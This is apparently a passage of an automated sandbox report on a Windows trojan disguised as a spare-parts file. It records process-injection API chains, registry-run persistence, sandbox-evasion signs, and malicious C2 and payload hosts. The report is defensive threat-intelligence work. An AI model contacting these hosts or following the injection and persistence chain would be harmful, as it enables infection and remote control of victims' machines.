                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 12_2_0289827F Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 12_2_02898746 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe | Code function: 12_2_028948A2 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread
                Source: DWG spare parts 455RTMGF Model.exeBinary or memory string: OriginalFilename vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247695857.000000007FC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258811076.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000000.247132071.0000000000470000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247631839.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258432147.000000000235B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.249248521.000000007F580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exeBinary or memory string: OriginalFilenameDropbox.exe0 vs DWG spare parts 455RTMGF Model.exe
                Source: DWG spare parts 455RTMGF Model.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Uuddcmhn.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: DWG spare parts 455RTMGF Model.exeReversingLabs: Detection: 76%
                Source: DWG spare parts 455RTMGF Model.exeVirustotal: Detection: 54%
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe "C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe"
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                Source: unknownProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe "C:\Users\Public\Libraries\Uuddcmhn.exe"
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exe
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@9/5@5/3
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02518252 GetDiskFreeSpaceA,0_2_02518252
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025245F8 CreateToolhelp32Snapshot,Process32First,lstrcmpiA,CloseHandle,Process32Next,CloseHandle,0_2_025245F8
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-COV1FL
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: Binary string: easinvoker.pdb source: DWG spare parts 455RTMGF Model.exe, DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbH source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C2AC push 0252C318h; ret 0_2_0252C310
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252B0E8 push 0252B29Bh; ret 0_2_0252B293
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C0AC push 0252C125h; ret 0_2_0252C11D
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525152 push 025251BEh; ret 0_2_025251B6
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525154 push 025251BEh; ret 0_2_025251B6
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C144 push 0252C1ECh; ret 0_2_0252C1E4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252C1F8 push 0252C288h; ret 0_2_0252C280
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02524664 push 025246A2h; ret 0_2_0252469A
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251D77C push 0251D7A8h; ret 0_2_0251D7A0
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251C700 push ecx; mov dword ptr [esp], edx0_2_0251C705
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025237A4 push 025237DCh; ret 0_2_025237D4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025165FA push 02516657h; ret 0_2_0251664F
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025165FC push 02516657h; ret 0_2_0251664F
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02523596 push 02523643h; ret 0_2_0252363B
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02523598 push 02523643h; ret 0_2_0252363B
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02516A60 push 02516AA2h; ret 0_2_02516A9A
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02524B40 push 02524B78h; ret 0_2_02524B70
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251CB34 push 0251CF8Ah; ret 0_2_0251CF82
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02513894 push eax; ret 0_2_025138D0
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525910 push ecx; mov dword ptr [esp], edx0_2_02525915
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251CE04 push 0251CF8Ah; ret 0_2_0251CF82
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251FE90 push 0251FF06h; ret 0_2_0251FEFE
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251FF93 push 0251FFE1h; ret 0_2_0251FFD9
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0251FF94 push 0251FFE1h; ret 0_2_0251FFD9
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C2A5 push 0276C318h; ret 2_2_0276C310
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C2AC push 0276C318h; ret 2_2_0276C310
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276B0E8 push 0276B29Bh; ret 2_2_0276B293
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C0AC push 0276C125h; ret 2_2_0276C11D
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_02765154 push 027651BEh; ret 2_2_027651B6
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_02765152 push 027651BEh; ret 2_2_027651B6
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_0276C144 push 0276C1ECh; ret 2_2_0276C1E4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeFile created: C:\Users\Public\Libraries\Uuddcmhn.exe
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Uuddcmhn

                Hooking and other Techniques for Hiding and Protection

                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (124).png
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Code function: 2_2_02765DE4 Sleep,ExitProcess,2_2_02765DE4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe TID: 5956; Thread sleep count: 32 > 30
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe TID: 5956; Thread sleep time: -96000s >= -30000s
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Last function: Thread delayed
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; API coverage: 9.2 %
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: 0_2_02515B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02515B48
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; API call chain: ExitProcess graph end node graph_0-17344
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; API call chain: ExitProcess graph end node graph_0-19181
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; API call chain: ExitProcess graph end node graph_12-16144
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; API call chain: ExitProcess graph end node graph_12-17035

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Memory written: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Memory written: C:\Users\Public\Libraries\Uuddcmhn.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: 0_2_025248A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_025248A4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: 0_2_02523E60 VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpyA,WriteProcessMemory,CreateRemoteThread,CloseHandle,0_2_02523E60
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Code function: 12_2_02893E60 VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,WriteProcessMemory,CreateRemoteThread,CloseHandle,12_2_02893E60
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Process created: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Process created: C:\Users\Public\Libraries\Uuddcmhn.exe C:\Users\Public\Libraries\Uuddcmhn.exe
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02515D0C
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: GetLocaleInfoA,0_2_0251AA1C
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: GetLocaleInfoA,0_2_0251A9D0
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02515E18
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02885D0C
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Code function: GetLocaleInfoA,12_2_0288AA1C
                Source: C:\Users\Public\Libraries\Uuddcmhn.exe; Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02885E17
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: 0_2_02519450 GetLocalTime,0_2_02519450
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe; Code function: 0_2_0251B950 GetVersionExA,0_2_0251B950

                Stealing of Sensitive Information

                Source: Yara match; File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR
                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 311 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | - | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 22 Application Layer Protocol | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
                Source | Detection | Scanner | Label
                DWG spare parts 455RTMGF Model.exe | 76% | ReversingLabs | Win32.Trojan.FormBook
                DWG spare parts 455RTMGF Model.exe | 55% | Virustotal | -

                No Antivirus matches

                Source | Detection | Scanner | Label
                0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpack | 100% | Avira | TR/Hijacker.Gen
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen

                Source | Detection | Scanner | Label
                geoplugin.net | 0% | Virustotal | -
                bestsuccess.ddns.net | 12% | Virustotal | -

                Source | Detection | Scanner | Label
                http://geoplugin.net/json.gp | 0% | URL Reputation | safe
                http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
                bestsuccess.ddns.net | 100% | Avira URL Cloud | malware

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                geoplugin.net | 178.237.33.50 | true | false | - | unknown
                f0719949.xsph.ru | 141.8.192.151 | true | false | - | high
                bestsuccess.ddns.net | 79.134.225.115 | true | true | - | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                http://f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh | false | - | high
                bestsuccess.ddns.net | true | Avira URL Cloud: malware | unknown

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://geoplugin.net/json.gp/C | DWG spare parts 455RTMGF Model.exe, 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyu | Uuddcmhn.exe, 0000000C.00000002.315054022.00000000029DE000.00000004.00001000.00020000.00000000.sdmp | false | - | high

                      IP | Domain | Country | ASN | ASN Name | Malicious
                      79.134.225.115 | bestsuccess.ddns.net | Switzerland | 6775 | FINK-TELECOM-SERVICESCH | true
                      178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                      141.8.192.151 | f0719949.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:704249
                      Start date and time:2022-09-16 17:07:30 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 11s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:DWG spare parts 455RTMGF Model.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:27
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
